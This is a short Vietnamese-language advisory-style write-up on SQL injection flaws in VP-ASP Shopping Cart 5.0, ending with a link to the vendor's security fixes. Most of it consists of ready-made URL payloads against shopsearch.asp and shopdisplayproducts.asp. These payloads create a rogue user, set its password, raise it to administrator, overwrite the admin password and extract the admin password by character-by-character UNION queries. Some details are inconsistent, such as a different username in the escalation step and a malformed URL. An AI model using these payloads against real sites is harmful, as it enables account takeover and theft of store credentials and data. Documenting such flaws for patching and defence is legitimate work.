Phân tích lỗi SQL Injection trong VP-ASP Shopping Cart 5.0

I. Mô tả :

Virtual Programming VP-ASP Shopping Cart 5.0 được viết bằng PHP , Hỗ trợ những CSDL : Access , MySQL , MSSQL trong OS Windows hoặc Linux . Lỗi SQL Injection trong VP-ASP Shopping Cart 5.0 cho phép Hacker tạo tài khoản Admin và truy vấn thông tin trong CSDL , thực thi các lệnh trong hệ thông .

II . Chi tiết :

Lỗi 1 : SQL Injection trong 'shopsearch.asp' cho phép Hacker tao tài khoản hoặc thay đổi password của Admin

Tao tài khoản Admin :

Tạo user : security.com.vn

http://domain.com/shopsearch.asp?Keyword=&category=5); insert into tbluser (fldusername) values ('security.com.vn')--&SubCategory=&hide=&action.x=46&action.y=6

Tao password " security " cho user " security.com.vn

http://domain.com/shopsearch.asp?Keyword=&category=5); update tbluser set fldpassword='security' where fldusername='security.com.vn'--&SubCategory=All&action.x=33&action.y=6

Nâng quyền cho user " security.com.vn " lên Administrator

http://domain.com/shopsearch.asp?Keyword=&category=3); update tbluser set fldaccess='1' where fldusername='qasdew'--&SubCategory=All&action.x=33&action.y=6

Thay đổi password Admin "security.com.vn" :

http://domain.com/shopsearch.asp?Keyword=&category=5); update tbluser set fldpassword='security.com.vn' where fldusername='admin'--&SubCategory=All&action.x=33&action.y=6

Lỗi 2 : SQL Injection trong 'shopdisplayproducts.asp' cho phép Hacker truy vấn CSDL để xem thông tin :

http://domain.com/shopsearch.asp?shopdisplayproducts.asp?cat=security.com.vn'%20union%20select%20fldauto,fldpassword%

20from%20tbluser%20where%20fldusername='admin'%20and%20fldpassword%20like%20'a%25'--

chú ý thay đổi value sau mỗi request :

%20'a%25'--

%20'b%25'--

%20'c%25'--

II . Sửa lỗi : http://www.vpasp.com/virtprog/info/faq_securityfixes.htm